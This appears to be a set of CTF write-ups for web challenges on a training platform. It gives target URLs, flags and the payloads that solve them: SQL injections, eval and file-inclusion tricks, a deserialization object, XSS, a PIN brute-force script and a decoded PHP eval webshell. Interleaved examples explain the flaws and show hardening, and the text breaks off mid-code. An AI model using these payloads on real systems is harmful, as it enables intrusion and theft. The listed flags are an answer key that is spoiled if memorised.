# WEB

## WEB2
They say clever people can all find the answer
http://120.24.86.145:8002/web2/
The key is in an HTML comment in the page source: KEY{Web-2-bugKssNNikls9100}
## File upload test
http://103.238.227.13:10085/
Flag format: Flag:xxxxxxxxxxxxx
Flag:42e97d465f962c53df9549377b513c7e
Upload a file with a .php extension and change the Content-Type of the upload to image/gif (or similar); that is all it takes.
## Arithmetic problem
URL: http://120.24.86.145:8002/yanzhengma/
Remove the front-end input restriction (it is enforced only in the browser). flag{CTF-bugku-0032}
## Web basics $_GET
http://120.24.86.145:8002/get/
Visit http://120.24.86.145:8002/get/?what=flag to get flag{bugku_get_su8kej2en}.
## Web basics $_POST
http://120.24.86.145:8002/post/
Use HackBar to POST what=flag; the response gives flag{bugku_get_ssseint67se}.
## Where are you from
http://120.24.86.145:9009/from.php
Add the HTTP header Referer: https://www.google.com
flag{bug-ku_ai_admin}
## First class
http://120.24.86.145:9009/hd.php
The flag is a response header (`flag{Bugku_k8_23s_istra}:`); you will not see it by just looking at the rendered page in F12, so inspect the response headers.
## md5 collision(NUPT_CTF)
http://120.24.86.145:9009/md5.php
http://120.24.86.145:9009/md5.php?a=s878926199a
md5('s878926199a') is 0e545993274517709034328855841020: a digest of the form 0e followed only by digits, which PHP's loose comparison `==` treats as the number 0, so it compares equal to any other such digest.
flag{md5_collision_is_easy}

http://120.24.86.145:8002/get/index1.php
```php
$num=$_GET['num'];
if(!is_numeric($num)){
    echo $num;
    if($num==1)
        echo 'flag{**********}';
}
```
`1x` and `1e0x` fail is_numeric(), but `==` against the integer 1 converts their leading numeric part (on PHP 7; PHP 8 changed this comparison), so either of these works:
http://120.24.86.145:8002/get/index1.php?num=1x
http://120.24.86.145:8002/get/index1.php?num=1e0x
flag{bugku-789-ps-ssdf}
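The PHP comparison semantics behind both the md5 collision and the index1.php check above, as an added example that is not part of the write-up. QNKCDZO is a second well-known input whose md5 is also a 0e digest; everything else is plain PHP.

```php
<?php
// Added example, not the challenges' code: PHP loose comparison (==) on numeric-looking strings.
declare(strict_types=1);

// index1.php: a string that fails is_numeric() can still == 1, because PHP 7 converts a
// numeric-leading string ("1x" -> 1, "1e0x" -> 1.0) when comparing it with an int.
function weak_is_one(string $num): bool
{
    return !is_numeric($num) && $num == 1;
}

// Hardened: compare strings with strings, and accept only the canonical spelling.
function strict_is_one(string $num): bool
{
    return $num === '1';
}

// md5.php: both digests below start with "0e" followed only by digits. As numeric strings
// they are 0 * 10^n, so "0e5459..." == "0e8304..." is true on every PHP version.
function weak_hash_match(string $a, string $b): bool
{
    return md5($a) == md5($b);
}

// Hardened: hash_equals() compares the strings byte by byte (and in constant time), no juggling.
function strict_hash_match(string $a, string $b): bool
{
    return hash_equals(md5($a), md5($b));
}

// Constructed probes.
var_dump(md5('s878926199a'));                          // string(32) "0e545993274517709034328855841020"
var_dump(md5('QNKCDZO'));                              // string(32) "0e830400451993494058024219903391"
var_dump(weak_hash_match('s878926199a', 'QNKCDZO'));   // bool(true)   the "collision"
var_dump(strict_hash_match('s878926199a', 'QNKCDZO')); // bool(false)

var_dump(is_numeric('1x'), is_numeric('1e0x'));        // bool(false) bool(false)
var_dump(weak_is_one('1x'));    // bool(true) on PHP 7; bool(false) on PHP 8, where int == non-numeric string compares as strings
var_dump(weak_is_one('1e0x'));  // same
var_dump(strict_is_one('1x'));  // bool(false)
```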
## WEB3
The flag is right here, come and find it
http://120.24.86.145:8002/web3/
CTRL+U; CTRL+W; CTRL+END gives an HTML comment whose body is a run of numeric character references (the browser renders them as the key):
```html
<!--&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125;-->
```
Decoding them:
```python
s = '&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125;'
# strip the leading "&#" and trailing ";", split on the ";&#" separators, map each code point to its character
print(''.join(chr(int(x)) for x in s.strip('&#;').split(';&#')))
# KEY{J2sa42ahJK-HS11III}
```
## SQL injection
http://103.238.227.13:10083/
Format: KEY{}
Wide-byte injection: the application talks GBK to MySQL, so the escaping backslash (0x5c) inserted before the quote is swallowed as the second byte of the two-byte character 0xdd 0x5c, leaving the quote live.
```
http://103.238.227.13:10083/?id=1%dd'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1輁'' LIMIT 1' at line 1
http://103.238.227.13:10083/?id=1%dd'--+
normal response
http://103.238.227.13:10083/?id=1%dd' order by 2--+
the query returns 2 columns
http://103.238.227.13:10083/?id=1%dd' union select string,0 from `key` where id=1--+
54f3320dc261f313ba712eb3f13a1f6d
```
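The byte-level mechanics of that %dd' bypass, as an added example that is not part of the write-up; the table name in the prepared statement is a placeholder.

```php
<?php
// Added example, not the challenge's code: why "1%dd'" survives escaping when PHP escapes
// byte-wise but MySQL decodes the connection as GBK, and how to close the gap.
declare(strict_types=1);

// The weak path: addslashes() (or real_escape_string() on a connection whose charset was
// never set) puts a backslash (0x5c) before the quote without knowing about GBK.
function weak_escape(string $id): string
{
    return addslashes($id);                 // "1\xdd'"  ->  "1\xdd\\'"  (bytes 31 dd 5c 27)
}

// What the server sees: with character_set_connection=gbk the bytes 0xdd 0x5c form ONE
// two-byte character (輁), so the backslash is consumed and the quote is live again.
function as_gbk_server_sees(string $fragment): string
{
    return mb_convert_encoding($fragment, 'UTF-8', 'GBK');
}

// Defensive check: a value that is not valid in the connection charset cannot be escaped
// correctly, so refuse it before it gets anywhere near a query.
function valid_in_charset(string $value, string $charset): bool
{
    return mb_check_encoding($value, $charset);
}

// Real fix: bind the value so no escaping is needed, and still tell the driver the charset
// (mysqli_set_charset() / charset= in the PDO DSN) so any residual escaping is charset-aware.
function fetch_by_id(PDO $pdo, string $id): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM news WHERE id = ? LIMIT 1'); // "news" is a placeholder table
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$input   = "1\xdd'";                 // what ?id=1%dd' decodes to (constructed)
$escaped = weak_escape($input);

printf("escaped bytes : %s\n", bin2hex($escaped));            // 31dd5c27
printf("server view   : %s\n", as_gbk_server_sees($escaped)); // 1輁'   <- the quote is unescaped
printf("byte length %d, GBK characters %d\n", strlen($escaped), mb_strlen($escaped, 'GBK')); // 4 vs 3
printf("valid GBK?    : %s\n", valid_in_charset($input, 'GBK') ? 'yes' : 'no'); // no: 0xdd 0x27 is not a GBK pair
```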
## Domain resolution
They say resolving flag.bugku.com to 120.24.86.145 gets you the flag
Visit 120.24.86.145, intercept the request in Burp and change the Host header to flag.bugku.com. KEY{DSAHDSJ82HDS2211}
## SQL injection 1
URL: http://103.238.227.13:10087/
Hint: keywords are filtered, can you get past it?
Flag format: KEY{xxxxxxxxxxxxx}
Part of the filter code:
```php
// SQL filter
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
    if (substr_count($id, $value) > 0)
    {
        exit('包含敏感关键字!'.$value);
    }
}
// XSS filter
$id = strip_tags($id);
$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
```
strip_tags() removes HTML and PHP tags from a string. Because it runs after the keyword check, a tag placed inside a keyword (an<a>d) passes the blacklist and is then stripped out, reassembling the keyword in the query.
```
http://103.238.227.13:10087?id=1 an<a>d 1=2--+
confirms the bypass works
http://103.238.227.13:10087?id=1 o<a>rder by 2--+
the query returns 2 columns
http://103.238.227.13:10087?id=1 un<a>ion sel<a>ect 1,hash fr<a>om `key` where id=1--+
c3d3c17b4ca7f791f85e#$1cc72af274af4adef
```
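The ordering bug in that filter next to the two checks that would have stopped it, as an added example that is not the challenge's code; the probe inputs are constructed and the table name is a placeholder.

```php
<?php
// Added example, not the challenge's code: the blacklist runs on the raw input but
// strip_tags() runs afterwards, so "an<a>d" passes the check and then becomes "and".
declare(strict_types=1);

const BLACKLIST = ['table', 'union', 'and', 'or', 'load_file', 'create', 'delete', 'select',
                   'update', 'sleep', 'alter', 'drop', 'truncate', 'from', 'max', 'min', 'order', 'limit'];

// Reproduces the challenge's order: keyword check first, tag stripping second.
// (substr_count is also case-sensitive, so "AND" would slip through as well.)
function vulnerable_filter(string $id): ?string
{
    foreach (BLACKLIST as $word) {
        if (substr_count($id, $word) > 0) {
            return null;                     // rejected
        }
    }
    return strip_tags($id);                  // tags removed AFTER the check
}

// Hardening 1: the column is an integer id, so accept only a canonical integer and
// nothing else ever reaches the SQL text.
function safe_id(string $id): ?int
{
    if (!preg_match('/\A[1-9][0-9]{0,9}\z/', $id)) {
        return null;
    }
    return (int)$id;
}

// Hardening 2: even for free-text columns, bind the value instead of concatenating it.
function fetch_row(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM temp WHERE id = ? LIMIT 1');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: the first is blocked, the second (the write-up's bypass) is not.
var_dump(vulnerable_filter('1 and 1=2'));        // NULL                     blocked
var_dump(vulnerable_filter('1 an<a>d 1=2--'));   // string(11) "1 and 1=2--" bypass reassembled
var_dump(safe_id('1 an<a>d 1=2--'));             // NULL
var_dump(safe_id('42'));                         // int(42)
```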
## You must make it stop
URL: http://120.24.86.145:8002/web12/
Author: @berTrAM
Disable JavaScript in Chrome DevTools, then refresh the page by hand a few times. The image URL in the page is not always valid; when an image does display (10.jpg), the flag is visible in the page source. Alternatively, capture the request in Burp and resend it a few times.
flag{dummy_game_1s_s0_popular}
## Local include
URL: http://120.24.86.145:8003/
```php
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>
```
Whatever is passed as hello is spliced into eval(), so a PHP expression is executed as written:
view-source:http://120.24.86.145:8003/?hello=scandir('.')
view-source:http://120.24.86.145:8003/?hello=file('flag.php')
flag{bug-ctf-gg-99}
## Variable 1
http://120.24.86.145:8004/index1.php
```php
flag In the variable ! <?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}?>
```
We can read the value of a variable variable but do not know the flag variable's name, so use a superglobal: $GLOBALS holds every file-scope variable, including the one defined in flag1.php.
```
view-source:http://120.24.86.145:8004/index1.php?args=GLOBALS
["ZFkwe3"]=>
string(38) "flag{92853051ab894a64f7865cf3c2128b34}"
```
## WEB5
JSPFUCK?????? Answer format CTF{**}
http://120.24.86.145:8002/web5/
Letters are uppercase
The page source is one long JSFuck expression (built only from the characters []()!+). Run it in the Chrome console; the challenge says the letters are uppercase. CTF{WHATFK}
## WEB4
Take a look at the source code
http://120.24.86.145:8002/web4/
```javascript
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));
```
Run the same p1 and p2 definitions in the Chrome console, but evaluate the concatenation instead of passing it to eval():
```javascript
unescape(p1) + unescape('%35%34%61%61%32' + p2);
```
which gives
```javascript
function checkSubmit(){
    var a=document.getElementById("password");
    if("undefined"!=typeof a){
        if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)
            return!0;
        alert("Error");
        a.focus();return!1
    }
}
document.getElementById("levelQuest").onsubmit=checkSubmit;
```
Enter 67d709b2b54aa2aa648cf6e87a7114f1 as the password. KEY{J22JK-HS11}
## The flag is in index
http://120.24.86.145:8005/post/
```php
// read the source with the php://filter wrapper:
// http://120.24.86.145:8005/post/index.php?file=php://filter/convert.base64-encode/resource=index.php
<html>
<title>Bugku-ctf</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
}
include($file);
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>
```
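Why the blacklist in that index.php lets php://filter through, next to an allowlist that does not, as an added example that is not the challenge's code; the page mapping and probe strings are constructed.

```php
<?php
// Added example, not the challenge's code: substring blacklist vs. an allowlist for include().
declare(strict_types=1);

// The challenge's check: blocks "../", "tp" (http/ftp), "input" and "data", but php://filter
// contains none of those substrings, so the wrapper can read index.php itself, base64-encoded.
function blacklist_allows(string $file): bool
{
    return !(strstr($file, '../') || stristr($file, 'tp') || stristr($file, 'input') || stristr($file, 'data'));
}

// Allowlist: the request supplies a short token, the server maps it to a fixed file, and
// anything not in the map is refused. No path or wrapper syntax from the client reaches include().
const PAGES = ['show' => 'show.php', 'about' => 'about.php'];   // constructed mapping

function resolve_page(string $token): ?string
{
    return PAGES[$token] ?? null;
}

$probes = [
    'show.php',
    '../etc/passwd',
    'http://attacker.example/x',
    'php://filter/convert.base64-encode/resource=index.php',   // the write-up's payload
    'show',
];
foreach ($probes as $p) {
    printf("%-56s blacklist:%-6s allowlist:%s\n",
        $p,
        blacklist_allows($p) ? 'pass' : 'block',
        resolve_page($p) ?? 'refused');
}
// ../etc/passwd and http://... are blocked by the blacklist, but the php://filter line passes it;
// the allowlist accepts only the token "show" and refuses every other probe.
```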
## phpcmsV9
It's just a target box, don't wreck it.
Thanks to everyone for showing mercy; the flag is in a txt file in the web root
http://120.24.86.145:8001/
The site is already riddled with webshells left by others; pick any one:
```php
// view-source:http://120.24.86.145:8001/html/special/test000/
<?php file_put_contents('tiny.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW3Bhc3NdKTs/Pg==')); ?>
// the base64 decodes to: <?php @eval($_POST[pass]);?>
```
Connecting with 菜刀 (China Chopper) yields [flag.jpg](http://120.24.86.145:8001/flag.jpg); the string flag{admin_a23-ae2132_key} is hidden at the end of the image.
## SeaCMS (海洋CMS)
URL: http://120.24.86.145:8008/
The flag is in some txt file in the web root
A directory scan finds flag.php: flag{felege-ctf-2017_04}.
## Enter the password to see the flag
http://120.24.86.145:8002/baopo/
Author: Se7en
The challenge says outright that it is brute force. In Burp Intruder set the payload position to pwd=§1§§1§§1§§1§§1§, attack type Cluster bomb and a numeric payload set: 100,000 candidates, so it takes a while. Or write a small script. The password is 13579.
```python
# coding: utf8
import requests, itertools, string

u = "http://120.24.86.145:8002/baopo/"
d = string.digits
req = requests.session()
cnt = 0
for i in itertools.product(d, repeat=5):      # every 5-digit PIN, 00000..99999
    data = {"pwd": ''.join(i)}
    r = req.post(u, data=data)
    cnt += 1
    if "密码不正确" not in r.text:              # the "wrong password" message is absent: hit
        print("correct,", data)
        break
    if cnt % 1000 == 0:                         # progress counter
        print(cnt)
```
flag{bugku-baopo-hah}
## Ex-girlfriend
http://47.93.190.246:49162/
Flag format: SKCTF{xxxxxxxxxxxxxxxxxx}
```php
// http://47.93.190.246:49162/code.txt
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>
```
http://47.93.190.246:49162/?v1[]=&v2[]=1&v3[]=
Passing an array to md5() or strcmp() makes them return NULL, which is falsy: NULL == NULL satisfies the md5 check while the two arrays are still != each other, and !strcmp() on NULL is true.
SKCTF{Php_1s_tH3_B3St_L4NgUag3}
## Click one million times
http://120.24.86.145:9001/test/
```html
<script>
var clicks=0
$(function() {
    $("#cookie")
        .mousedown(function() {
            $(this).width('350px').height('350px');
        })
        .mouseup(function() {
            $(this).width('375px').height('375px');
            clicks++;
            $("#clickcount").text(clicks);
            if(clicks >= 1000000){
                var form = $('<form action="" method="post">' +
                    '<input type="text" name="clicks" value="' + clicks + '" hidden/>' +
                    '</form>');
                $('body').append(form);
                form.submit();
            }
        });
});
</script>
```
The JavaScript POSTs the count once clicks reaches one million, so just POST clicks=1000001 yourself and get flag{Not_C00kI3Cl1ck3r}.
## Backups are a good habit
http://120.24.86.145:8002/web16/
They say backups are a good habit
A scan finds index.php.bak:
```php
<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
 */
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
?>
```
str_replace('key','',...) makes one pass, so kkeyey becomes key after the replacement, and array values make both md5() calls return NULL. Visit http://120.24.86.145:8002/web16/?kkeyey1[]&kkeyey2[]=1 to get Bugku{OH_YOU_FIND_MY_MOMY}.
## Report card
Come check your grades
http://120.24.86.145:8002/chengjidan/
Simple SQL injection.
```
url: http://120.24.86.145:8002/chengjidan/index.php
post:
id=2' and 1=0 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
// fl4g,sc
id=2' and 1=0 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x666c3467#
// skctf_flag
id=2' and 1=0 union select 1,2,3,skctf_flag from fl4g#
// BUGKU{Sql_INJECT0N_4813drd8hz4}
```
## Qiumingshan old driver
http://120.24.86.145:8002/qiumingshan/
```python
import requests, re

u = "http://120.24.86.145:8002/qiumingshan/"
r = requests.session()                        # the answer must come back within the same session
# the page shows an arithmetic expression inside <div>...=; evaluate it (this trusts the server's text)
res = eval(re.findall("<div>(.*)=", r.get(u).text)[0])
print(r.post(u, data={"value": str(res)}).text)
# 原来你也是老司机 Bugku{YOU_DID_IT_BY_SECOND}
```
## Be fast
Be fast!!!!!!
http://120.24.86.145:8002/web6/
Format: KEY{xxxxxxxxxxxxxx}
Capturing the response shows an extra header:
```
flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogT1RjeU5EYzQ=
```
Base64-decoding the value gives `跑的还不错,给你flag吧: NjE0NzY4` ("not bad, here's your flag:" followed by a second base64 token). The response body is:
```html
</br>我感觉你得快点!!!<!-- OK ,now you have to post the margin what you find -->
```
Take care to keep the same session.
```python
import requests
import base64

url = 'http://120.24.86.145:8002/web6/'
ses = requests.session()
r = ses.get(url)
# the header is base64; its decoded text ends in a second base64 token after a space
token = base64.b64decode(r.headers['flag']).decode('utf-8').split(' ')[1]
key = base64.b64decode(token).decode('utf-8')
print(ses.post(url, data={'margin': key}).text)
# KEY{111dd62fcd377076be18a}
```
## Cookie spoofing
http://120.24.86.145:8002/web11/
Answer format: KEY{xxxxxxxx}
Redirects to http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy50eHQ= (filename is base64 for keys.txt), and the source can be read out line by line.
```python
import requests

for i in range(30):
    # filename=aW5kZXgucGhw is base64 for index.php; line selects one line of it
    url = 'http://120.24.86.145:8002/web11/index.php?line=%d&filename=aW5kZXgucGhw' % i
    print(requests.get(url).text.strip())
```
This reads index.php:
```php
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>
```
Then read keys.php, which is only on the list when the margin cookie is set:
```python
import requests, base64

for i in range(30):
    name = base64.b64encode(b'keys.php').decode()
    url = 'http://120.24.86.145:8002/web11/index.php?line=%d&filename=%s' % (i, name)
    print(requests.get(url, headers={'cookie': 'margin=margin'}).text.strip())
```
keys.php reads:
```php
<?php $key='KEY{key_keys}'; ?>
```
## XSS
http://103.238.227.13:10089/
Flag format: Flag:xxxxxxxxxxxxxxxxxxxxxxxx
Key code:
```html
<body>
<div class="container">
<h2>XSS注入测试</h2>
<div class="alert alert-success">
<p>1、请注入一段XSS代码,获取Flag值</p>
<p>2、必须包含alert(_key_),_key_会自动被替换</p>
</div>
<div id="s"></div>
</div>
<script>var s=""; document.getElementById('s').innerHTML = s;</script>
</body>
```
The page's instructions: 1. inject XSS to obtain the flag; 2. the payload must contain alert(_key_), where _key_ is replaced automatically. The id parameter is reflected inside the JavaScript string literal `var s=""`, so Unicode escapes work: the JS parser turns \u003c and \u003e into < and > before the value reaches innerHTML.
url: http://103.238.227.13:10089/?id=\u003c_key_\u003e
Flag: 17f094325e90085b30a5ddefce34acd8
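Why HTML-escaping alone would not have stopped that payload, and the context-correct encoding, as an added example that is not the challenge's code; the probe string is constructed, and json_decode() stands in for the browser's JS string parser because JSON uses the same \uXXXX escapes.

```php
<?php
// Added example, not the challenge's code: the id parameter lands inside a JavaScript string
// literal, so the HTML encoder is the wrong tool for that context and \u003c passes through it.
declare(strict_types=1);

// What the browser's JS parser makes of the string literal body (JSON shares the \uXXXX escape
// syntax, so json_decode stands in for the JS string parser here).
function js_string_value(string $literalBody): string
{
    return json_decode('"' . $literalBody . '"', false, 512, JSON_THROW_ON_ERROR);
}

// HTML-escaped only: the backslash-u sequences are untouched, the JS parser decodes them to
// angle brackets, and innerHTML then parses the result as markup.
function render_html_escaped_only(string $id): string
{
    $safeForHtml = htmlspecialchars($id, ENT_QUOTES, 'UTF-8');
    return "<script>var s=\"$safeForHtml\"; document.getElementById('s').innerHTML = s;</script>";
}

// Context-correct: emit the value as a JSON string literal with <, >, &, ', " hex-escaped and
// the backslash itself escaped, and assign it with textContent so the HTML parser never sees it.
function render_hardened(string $id): string
{
    $jsLiteral = json_encode(
        $id,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE | JSON_THROW_ON_ERROR
    );
    return "<script>var s=$jsLiteral; document.getElementById('s').textContent = s;</script>";
}

$payload = '\u003cb\u003eHI\u003c/b\u003e';   // constructed; same shape as the write-up's ?id= value

echo js_string_value($payload), "\n";          // <b>HI</b>   what innerHTML would receive
echo render_html_escaped_only($payload), "\n"; // the \u003c sequences survive htmlspecialchars()
echo render_hardened($payload), "\n";          // var s="\\u003cb\\u003eHI\\u003c\/b\\u003e"; stays literal text
```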
## never give up
http://120.24.86.145:8006/test/hello.php
Author: 御结冰城
Visiting 120.24.86.145:8006/test/1p.html directly redirects. view-source:http://120.24.86.145:8006/test/1p.html shows this line:
var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E" ;
Running unescape(Words) in the Chrome console gives a redirect script, `<script>window.location.href='http://www.bugku.com';</script>`, followed by an HTML comment whose body is base64; running unescape(atob(...)) on that base64 yields the PHP source:
```php
if(!$_GET['id']){
    header('Location: hello.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.')){
    echo 'no no no no no no no';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4){
    require("f4l2a3g.txt");
}
else{
    print "never never never give up !!!";
}
?>
```
http://120.24.86.145:8006/test/f4l2a3g.txt
gives flag{tHis_iS_THe_fLaG}
Or a=php://input&id=0&b=%00findneo.... ???????
## welcome to bugkuctf
http://120.24.86.145:8006/test1/
Author: pupil
```php
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
    echo "hello admin!<br>";
    include($file); //hint.php
}else{
    echo "you are not admin ! ";
}
```
```php
// http://120.24.86.145:8006/test1/?file=php://filter/convert.base64-encode/resource=index.php&txt=php://input
// POST body: welcome to the bugkuctf
// index.php
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
    echo "hello friend!<br>";
    if(preg_match("/flag/",$file)){
        echo "不能现在就给你flag哦";
        exit();
    }else{
        include($file);
        $password = unserialize($password);
        echo $password;
    }
}else{
    echo "you are not the number of bugku ! ";
}
?>
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
    echo "hello admin!<br>";
    include($file); //hint.php
}else{
    echo "you are not admin ! ";
}
-->
```
```php
// http://120.24.86.145:8006/test1/?file=php://filter/convert.base64-encode/resource=hint.php&txt=php://input
// POST body: welcome to the bugkuctf
// hint.php
<?php
class Flag{//flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("good");
        }
    }
}
?>
```
This tests PHP deserialization: hint.php defines Flag with a __tostring() that reads $this->file, and index.php echoes the unserialized password, which triggers it. Build the payload:
```php
<?php
class Flag{
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("good");
        }
    }
}
$f=new Flag();
$f->file='flag.php';
var_dump(serialize($f));
//string(41) "O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}"
?>
```
Visit
view-source:http://120.24.86.145:8006/test1/?file=hint.php&txt=php://input&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
while POSTing welcome to the bugkuctf, and get flag{php_is_the_best_language}
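The same __toString() gadget run offline against a temporary file, next to two ways of closing it, as an added example that is not the challenge's code. The Flag class follows hint.php but returns the file contents instead of echoing them; the temp file and its contents are constructed.

```php
<?php
// Added example, not the challenge's code: unserialize() of client data + a __toString()
// that reads a file, and the hardening that removes the gadget.
declare(strict_types=1);

class Flag
{
    public $file;
    public function __toString(): string
    {
        // adapted from hint.php: the read goes to the return value instead of echo
        return isset($this->file) ? (string)file_get_contents($this->file) : '';
    }
}

// A harmless file to read in this offline demo (constructed).
$target = tempnam(sys_get_temp_dir(), 'flag');
file_put_contents($target, "flag{placeholder}\n");

// The write-up's payload shape, pointing at our temp path instead of flag.php.
$f = new Flag();
$f->file = $target;
$payload = serialize($f);
echo $payload, "\n";               // O:4:"Flag":1:{s:4:"file";s:NN:"/tmp/flag...";}

// 1. Vulnerable: unserialize() instantiates any loaded class named in the data, and the
//    string conversion (the challenge's `echo $password;`) fires __toString().
function vulnerable(string $password): string
{
    $obj = unserialize($password);
    return (string)$obj;
}

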